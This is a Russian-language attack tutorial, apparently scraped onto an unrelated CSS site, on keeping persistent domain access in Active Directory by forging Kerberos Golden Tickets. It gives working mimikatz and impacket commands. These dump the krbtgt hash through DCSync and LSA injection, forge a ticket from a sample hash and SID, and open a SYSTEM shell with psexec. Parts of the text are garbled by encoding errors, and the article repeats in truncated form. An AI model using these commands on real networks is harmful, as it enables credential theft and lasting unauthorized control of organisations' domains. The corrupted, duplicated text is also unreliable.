Закрепляемся в Active Directory. Как сохранить доступ при атаке на домен - «Новости» » Самоучитель CSS
Меню
Наши новости
Учебник CSS

Невозможно отучить людей изучать самые ненужные предметы.

Введение в CSS
Преимущества стилей
Добавления стилей
Типы носителей
Базовый синтаксис
Значения стилевых свойств
Селекторы тегов
Классы
CSS3

Надо знать обо всем понемножку, но все о немногом.

Идентификаторы
Контекстные селекторы
Соседние селекторы
Дочерние селекторы
Селекторы атрибутов
Универсальный селектор
Псевдоклассы
Псевдоэлементы

Кто умеет, тот делает. Кто не умеет, тот учит. Кто не умеет учить - становится деканом. (Т. Мартин)

Группирование
Наследование
Каскадирование
Валидация
Идентификаторы и классы
Написание эффективного кода

Самоучитель CSS

Вёрстка
Изображения
Текст
Цвет
Линии и рамки
Углы
Списки
Ссылки
Дизайны сайтов
Формы
Таблицы
CSS3
HTML5

Новости

Блог для вебмастеров
Новости мира Интернет
Сайтостроение
Ремонт и советы
Все новости

Справочник CSS

Справочник от А до Я
HTML, CSS, JavaScript

Афоризмы

Афоризмы о учёбе
Статьи об афоризмах
Все Афоризмы

Видео Уроки


Видео уроки
Наш опрос



Наши новости

       
15-04-2020, 16:03
Закрепляемся в Active Directory. Как сохранить доступ при атаке на домен - «Новости»
Рейтинг:
Категория: Новости

Представь, что мы скомпрометировали привилегированные учетные записи, используя разные техники повышения привилегий, распространились по сети, скрылись от средств обнаружения, но неожиданно потеряли контроль над доменом, потому что администратор по какой-то причине сменил пароль! В сегодняшней статье мы разберем способы сохранить административный доступ, даже если администратор сменил пароли или разрешения.

Другие статьи про атаки на Active Directory


  1. Разведка в Active Directory. Получаем пользовательские данные в сетях Windows без привилегий

  2. Атаки на Active Directory. Разбираем актуальные методы повышения привилегий

  3. Боковое перемещение в Active Directory. Разбираем техники Lateral Movement при атаке на домен

  4. Защита от детекта в Active Directory. Уклоняемся от обнаружения при атаке на домен

  5. Защита от детекта в Active Directory. Как обмануть средства обнаружения при атаке на домен

  6. Сбор учеток в Active Directory. Как искать критически важные данные при атаке на домен



Закрепляемся в Active Directory. Как сохранить доступ при атаке на домен - «Новости»
WARNING
Вся информация предоставлена исключительно в ознакомительных целях. Ни редакция, ни автор не несут ответственности за любой возможный вред, причиненный информацией из этой статьи.

Kerberos Golden Tickets


Один из способов сохранить доступ к системе — сформировать Golden Ticket: пароль учетной записи krbtgt РЅРµ будет изменен РїСЂРё тех же условиях, РїСЂРё которых может быть изменен пароль администратора.


Golden Ticket — это поддельные билеты для выдачи билетов, также называемые аутентификационными билетами (они же TGT). Если посмотреть на схему аутентификации Kerberos в случае Golden Ticket, то можно заметить, что подлинность Kerberos не проверяется (AS-REQ и AS-REP с контроллером домена). Так как Golden Ticket является поддельным TGT, он отправляется контроллеру домена как часть TGS-REQ для получения билета TGS.


Схема аутентификации Kerberos c Golden Ticket
Схема аутентификации Kerberos c Golden Ticket

Золотой билет Kerberos — действительный билет Kerberos TGT, поскольку РѕРЅ зашифрован Рё подписан доменной учетной записью Kerberos (krbtgt). А так как TGT зашифрован хешем пароля krbtgt Рё может быть расшифрован любой службой KDC РІ домене, то билет Рё воспринимается как реальный. Для того чтобы сделать Golden Ticket, нам необходимо знать следующее:


  1. SPN домена.

  2. SID домена.

  3. NTLM-хеш доменной учетной записи krbtgt.

  4. Имя пользователя, под которым будет работать оператор (даже если такого пользователя не существует).

Так как имя пользователя можно использовать любое, остается найти три недостающих компонента. Название и SID домена можно узнать с помощью PowerShell-команды Get-ADDomain.


SID и имя домена
SID и имя домена

Теперь нужно получить NTLM-хеш учетной записи krbtgt. Сделать это можно как удаленно, так и с помощью mimikatz. С использованием mimikatz у оператора есть выбор: выполнить атаку DCSync, используя базу Security Account Managers (SAM), или задействовать модуль sekurlsa.


mimikatz # lsadump::dcsync /user:krbtgt

Получаем хеши с помощью mimikatz, используя атаку DCSync

mimikatz # privilege::debug
mimikatz # lsadump::lsa /inject /name:krbtgt

Получаем хеши с помощью mimikatz, используя базу SAM

mimikatz # sekurlsa::krbtgt

Получаем хеши с помощью mimikatz, используя модуль sekurlsa

Удаленная атака выполняется также с использованием DCSync или при наличии открытой сессии meterpreter.


impacket-secretsdump domain.dom/root@192.168.6.100

Получение хешей с помощью secretsdump

Существует два варианта использования meterpreter: РїСЂРё помощи hashdump и dcsync_ntlm (для второго нужно загрузить модуль kiwi).


Получение хешей с помощью meterpreter hashdump
Получение хешей с помощью meterpreter hashdump
Получение хешей с помощью meterpreter dcsync_ntlm
Получение хешей с помощью meterpreter dcsync_ntlm

РЎ помощью полученной информации можно создать Рё применить Golden Ticket. Сделаем это тремя способами: используя mimikatz, удаленно СЃ помощью ticketer и с использованием meterpreter.


 

Ticketer


Первым делом следует создать билет. Для этого используем СЃРєСЂРёРїС‚ ticketer из пакета impacket (напомню, что РёРјСЏ пользователя можно выдумать любое).


impacket-ticketer -nthash 08f5bf2e292d77d8e460d3926a0d90de -domain-sid S-1-5-21-719111203-942671344-1831409528 -domain domain.dom anyuser

Создание Golden Ticket с помощью ticketer

В текущей директории создан билет anyuser.ccache. Экспортируем его.


export KRB5CCNAME=anyuser.ccache

Теперь подключимся с помощью psexec РёР· того же пакета impacket.


python3 psexec.py -k -no-pass [домен]/[пользователь]@[имя хоста]

Подключаемся к хосту, используя golden ticket

Получаем удаленное управление с правами SYSTEM.


 

Mimikatz


Создадим поддельный золотой билет с помощью mimikatz.


Создание golden ticket с помощью mimikatz
Создание golden ticket с помощью mimikatz

Если РІ данной команде РЅРµ использовать параметр /ptt, то билет будет просто сохранен в текущей директории. В данном случае он сразу будет кеширован в памяти. Давай проверим это, вызвав командную строку.


mimikatz # misc::cmd

Теперь, выполнив команду klist, наблюдаем кешированный Golden Ticket.


Создание Golden Ticket с помощью mimikatz
Создание Golden Ticket с помощью mimikatz
 

Meterpreter


Для работы СЃ meterpreter будем использовать модуль kiwi. Первым делом создадим Golden Ticket.


Создание Golden Ticket с помощью meterpreter

Теперь применим его.


Применение Golden Ticket с помощью meterpreter

И проверим, что билет успешно загружен.


Загруженный Golden Ticket

Таким образом, у нас остается возможность работы с повышенными привилегиями, при этом мы не используем учетных данных администраторов. Это означает, что мы можем получить доступ всегда, даже при смене паролей пользователей, изменении их ролей и даже при удалении скомпрометированных учетных записей.


Представь, что мы скомпрометировали привилегированные учетные записи, используя разные техники повышения привилегий, распространились по сети, скрылись от средств обнаружения, но неожиданно потеряли контроль над доменом, потому что администратор по какой-то причине сменил пароль! В сегодняшней статье мы разберем способы сохранить административный доступ, даже если администратор сменил пароли или разрешения. Другие статьи про атаки на Active Directory Разведка в Active Directory. Получаем пользовательские данные в сетях Windows без привилегий Атаки на Active Directory. Разбираем актуальные методы повышения привилегий Боковое перемещение в Active Directory. Разбираем техники Lateral Movement при атаке на домен Защита от детекта в Active Directory. Уклоняемся от обнаружения при атаке на домен Защита от детекта в Active Directory. Как обмануть средства обнаружения при атаке на домен Сбор учеток в Active Directory. Как искать критически важные данные при атаке на домен WARNING Вся информация предоставлена исключительно в ознакомительных целях. Ни редакция, ни автор не несут ответственности за любой возможный вред, причиненный информацией из этой статьи. Kerberos Golden Tickets Один из способов сохранить доступ к системе — сформировать Golden Ticket: пароль учетной записи krbtgt РЅРµ будет изменен РїСЂРё тех же условиях, РїСЂРё которых может быть изменен пароль администратора. Golden Ticket — это поддельные билеты для выдачи билетов, также называемые аутентификационными билетами (РѕРЅРё же TGT). Если посмотреть РЅР° схему аутентификации Kerberos РІ случае Golden Ticket, то можно заметить, что подлинность Kerberos РЅРµ проверяется (AS-REQ Рё AS-REP СЃ контроллером домена). Так как Golden Ticket является поддельным TGT, РѕРЅ отправляется контроллеру домена как часть TGS-REQ для получения билета TGS. Схема аутентификации Kerberos c Golden Ticket Золотой билет Kerberos — действительный билет Kerberos TGT, поскольку РѕРЅ зашифрован Рё подписан доменной учетной записью Kerberos (krbtgt). А так как TGT зашифрован хешем пароля krbtgt Рё может быть расшифрован любой службой KDC РІ домене, то билет Рё воспринимается как реальный. Для того чтобы сделать Golden Ticket, нам необходимо знать следующее: SPN домена. SID домена. NTLM-хеш доменной учетной записи krbtgt. Имя пользователя, под которым будет работать оператор (даже если такого пользователя не существует). Так как имя пользователя можно использовать любое, остается найти три недостающих компонента. Название и SID домена можно узнать с помощью PowerShell-команды Get-ADDomain. SID Рё РёРјСЏ домена Теперь нужно получить NTLM-хеш учетной записи krbtgt. Сделать это можно как удаленно, так и с помощью mimikatz. С использованием mimikatz у оператора есть выбор: выполнить атаку DCSync, используя базу Security Account Managers (SAM), или задействовать модуль sekurlsa. mimikatz

Теги: CSS

Просмотров: 527
Комментариев: 0:   15-04-2020, 16:03
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь. Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

 
Еще новости по теме:



Другие новости по теме:
Комментарии для сайта Cackle